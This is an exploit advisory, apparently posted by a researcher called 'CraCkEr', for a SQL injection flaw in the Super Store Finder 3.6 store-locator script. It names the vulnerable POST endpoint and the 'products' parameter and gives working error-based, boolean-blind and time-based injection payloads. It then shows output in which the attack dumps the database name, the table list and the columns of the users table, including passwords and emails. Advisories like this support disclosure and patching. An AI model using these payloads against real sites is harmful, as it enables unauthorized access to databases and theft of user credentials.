Headline
Super Store Finder 3.6 SQL Injection
Super Store Finder version 3.6 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://codecanyon.net/item/super-store-finder/3630922 ││ Vendor : Super Store Finder ││ Software : Super Store Finder 3.6 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php---------------------------------------------------------------------------------POST /products/superstorefinder/index.php HTTP/1.1ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]---------------------------------------------------------------------------------POST parameter 'products' is vulnerable to SQL Injection---Parameter: products (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z---[+] Starting the Attackfetching current databasecurrent database: 'superstor_***'fetching tables[8 tables]+--------------+| categories_b || categories || stores_c || categories_c || stores_b || users_b || users || stores |+--------------+fetching columns for table 'users'[11 columns]+-------------+| id || username || password || firstname || lastname || facebook_id || address || email || created || modified || status |+-------------+[-] Done